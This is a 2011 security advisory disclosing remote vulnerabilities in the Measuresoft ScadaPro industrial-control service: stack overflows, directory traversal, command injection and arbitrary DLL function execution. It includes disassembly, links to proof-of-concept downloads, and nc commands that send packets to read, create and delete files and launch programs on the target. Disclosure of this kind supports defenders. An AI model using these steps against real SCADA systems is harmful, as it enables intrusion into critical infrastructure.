CVE-2011-3497

#######################################################################

                             Luigi Auriemma

Application:  Measuresoft ScadaPro
              http://www.measuresoft.com/products/scada-products.aspx
Versions:     <= 4.0.0
Platforms:    Windows
Bugs:         arbitrary commands execution
              directory traversal in read, write and delete mode
              tons of stack overflow vulnerabilities
              various Denial of Service vulnerabilities
Exploitation: remote
Date:         13 Sep 2011
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bugs
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


From vendor's website:
"ScadaPro is Real Time Data Acquisition software for Microsoft Windows.
Optimised to use the powerful real time, multi-tasking features of
Windows, ScadaPro provides integrated data acquisition, monitoring,
data logging, mimic development and report generation."


#######################################################################

=======
2) Bugs
=======


service.exe is a service listening on port 11234.

Initially I started to test this software as usual by checking all the
operations performed by the various opcodes which are divided in a
group identified by the second byte of the packet while the first one
is the opcode for the final operation.
The function that handles the various groups and opcodes is available
at offset 004061F0.

The problem is that there are so much security vulnerabilities and
design problems in this service that makes non convenient to continue
the tests so after the checking of the opcodes of the 'F' group and a
quick scan of the others I stopped any test to avoid to waste other
time.
It means that there are for sure other vulnerabilities but the most
importants (stack overflows, code execution and files access) have been
covered in the 'F' group and the main stack overflows of all the groups
can be catched with the simple scanner I linked in the next section.

In short there are stack overflow vulnerabilities in almost all the
supported commands and they are divided in sscanf and in-line strcpy
functions like the following taken from the "TF" command:

  0040A0D9   . 8D5424 38      LEA EDX,DWORD PTR SS:[ESP+38]
  0040A0DD   . 52             PUSH EDX
  0040A0DE   . 68 84D46700    PUSH service.0067D484     ; "%s"
  0040A0E3   . 57             PUSH EDI
  0040A0E4   . E8 12F20000    CALL service.004192FB     ; sscanf
  ...
  0040A114   > 8D5424 20      LEA EDX,DWORD PTR SS:[ESP+20]
  0040A118   . 8BC7           MOV EAX,EDI
  0040A11A   . 2BD7           SUB EDX,EDI
  0040A11C   . 8D6424 00      LEA ESP,DWORD PTR SS:[ESP]
  0040A120   > 8A08           MOV CL,BYTE PTR DS:[EAX]
  0040A122   . 880C02         MOV BYTE PTR DS:[EDX+EAX],CL
  0040A125   . 83C0 01        ADD EAX,1
  0040A128   . 84C9           TEST CL,CL
  0040A12A   .^75 F4          JNZ SHORT service.0040A120

Obviously there are many Denial of Service bugs too.

Then there is full control over the files to read and write and the
possibility to use directory traversal attacks like in the "RF" and
"wF" (the first char is lower because there is a check for avoiding its
usage), example of the tab-separeted arguments:

  RF%
    filename
    ReadFile.nNumberOfBytesToRead
    SetFilePointer.lDistanceToMove
    SetFilePointer.dwMoveMethod
    CreateFile.dwDesiredAccess
    CreateFile.dwShareMode 
    ???
    CreateFile.dwCreationDisposition
    CreateFile.dwFlagsAndAttributes
    content if in write mode

It's also possible to delete files and whole folders (included their
files) via the "UF" and "NF" commands.

Then it's possible to pass custom arguments to the backup commands like
what happens with "BF", "OF" and "EF" while executing mszip because the
arguments are not sanitized versus the injection of the '"' char.
The program supports also other backup programs like tar and compress.

And finally, through the "XF" command it's possible to execute an
arbitrary function of a dll, for example the "system" one of msvcrt.dll
for executing any desired custom command.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15707.zip

only a simple scanner:
  udpsz -d 2 -c "xx%"       -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
  udpsz -d 2 -c "xx%test\t" -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000
  udpsz -d 2 -c "xx%test,"  -b a -X 0 16 l 0x6161 -T -l 0 SERVER 11234 0x2000

http://aluigi.org/poc/scadapro_1.zip
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17844-2.zip

  nc SERVER 11234 < scadapro_1b.dat     ; read c:\boot.ini
  nc SERVER 11234 < scadapro_1c.dat     ; create c:\evil_file.txt
  nc SERVER 11234 < scadapro_1d.dat     ; delete c:\valid_file.txt
  nc SERVER 11234 < scadapro_1e.dat     ; execute notepad


#######################################################################

======
4) Fix
======


No fix.


#######################################################################